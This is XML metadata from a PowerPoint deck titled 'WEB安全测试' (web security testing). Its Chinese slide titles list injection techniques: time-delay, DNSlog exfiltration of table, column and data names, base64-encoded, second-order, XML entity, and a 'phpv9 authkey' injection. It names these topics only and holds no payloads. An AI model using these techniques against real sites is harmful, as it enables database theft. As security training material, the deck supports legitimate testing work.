      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>延迟注入</vt:lpstr>
      <vt:lpstr>延迟注入</vt:lpstr>
      <vt:lpstr>dnslog 注入</vt:lpstr>
      <vt:lpstr>dns 注入列表名</vt:lpstr>
      <vt:lpstr>dns注入列列名</vt:lpstr>
      <vt:lpstr>dns注入列数据</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>base64编码注入</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>二阶注入</vt:lpstr>
      <vt:lpstr>二阶注入</vt:lpstr>
      <vt:lpstr>二阶注入</vt:lpstr>
      <vt:lpstr>二阶注入</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>phpv9 authkey注入</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>xml实体注入</vt:lpstr>
      <vt:lpstr>xml注入实例</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>app注入挖掘</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WEB安全测试</dc:title>
  <dc:creator>admin</dc:creator>
  <cp:lastModifiedBy>Cracer</cp:lastModifiedBy>
  <cp:revision>25</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-23T15:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-09T15:23:42Z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2052-11.8.2.8506</vt:lpwstr>
  </property>
</Properties>
</file>